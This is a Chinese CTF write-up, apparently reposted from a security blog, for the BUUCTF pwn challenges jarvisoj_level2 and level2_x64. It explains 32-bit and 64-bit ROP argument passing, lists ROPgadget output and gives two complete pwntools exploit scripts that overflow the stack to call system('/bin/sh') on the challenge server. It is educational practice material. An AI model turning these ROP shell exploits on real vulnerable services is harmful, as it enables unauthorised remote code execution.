题目
平台:BUUCTF
题目:jarvisoj_level2 & jarvisoj_level2_x64
考点:32位和64位ROP传参(有system和/bin/sh)
分析
32位
IDA反编译后Shift+F12看到给出了system@plt函数和/bin/sh字符串的地址
根据32位传参方式,构造ROP
padding + 函数plt地址 + 函数返回地址 + 参数1 + 参数2 + ...
64位
32位采用栈传参,而64位程序函数的前六个参数分别用寄存器rdi, rsi, rdx, rcx, r8, r9传参,后续参数采用栈传参
搜索可用gadget
ubuntu@ubuntu-vm:~/Desktop/pwn$ ROPgadget --binary level2_x64 --only "pop|ret"
Gadgets information
============================================================
0x00000000004006ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006ae : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop r14 ; pop r15 ; ret
0x00000000004006b2 : pop r15 ; ret
0x00000000004006ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006af : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400560 : pop rbp ; ret
0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x00000000004006ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004a1 : ret
Unique gadgets found: 11
同样从IDA找到system@plt函数和/bin/sh字符串的地址即可
漏洞利用
x86传参ROP
from pwn import *
from LibcSearcher import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
p = remote('node5.buuoj.cn', 28362)
#p=process('./pwn')
system_plt_addr = 0x8048320
binsh_addr = 0x804A024
payload = b'a'*(0x88+0x4) + p32(system_plt_addr) + p32(0xdeadbeef) + p32(binsh_addr)
p.sendlineafter(b'Input:', payload)
p.interactive()
x64传参ROP
from pwn import *
from LibcSearcher import *
context(log_level = 'debug', arch = 'amd64', os = 'linux')
p = remote('node5.buuoj.cn', 26963)
#p=process('./pwn')
pop_rdi_ret = 0x4006b3
system_plt_addr = 0x4004c0
binsh_addr = 0x600A90
payload = b'a'*(0x80+0x8) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_plt_addr)
p.sendlineafter(b'Input:', payload)
p.interactive()
原文始发于微信公众号(智佳网络安全):CTF学习-PWN-ROP
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/300895.html
